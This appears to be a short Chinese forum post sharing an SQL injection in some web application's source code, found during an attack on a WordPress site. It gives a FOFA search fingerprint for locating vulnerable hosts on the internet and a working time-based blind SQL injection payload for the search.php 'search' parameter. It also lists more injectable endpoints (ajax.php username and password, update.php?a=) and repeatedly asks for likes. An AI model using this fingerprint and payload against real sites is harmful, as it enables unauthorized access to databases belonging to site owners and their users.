之前搞一个wp站 旁站扫到一个源码备份 然后审出sql注入 很简单的一个注入 就不贴了
FOFA搜索 : "data/assets/toastr-master/toastr.js"
payloay: /search.php?search=' AND (SELECT 6433 FROM (SELECT(SLEEP(5)))hfrG) AND 'GnIg'='GnIg
点个赞吧 谢谢 点个赞吧 谢谢 点个赞吧 谢谢 点个赞吧 谢谢
ajax.php?username password
update.php?a=
都有
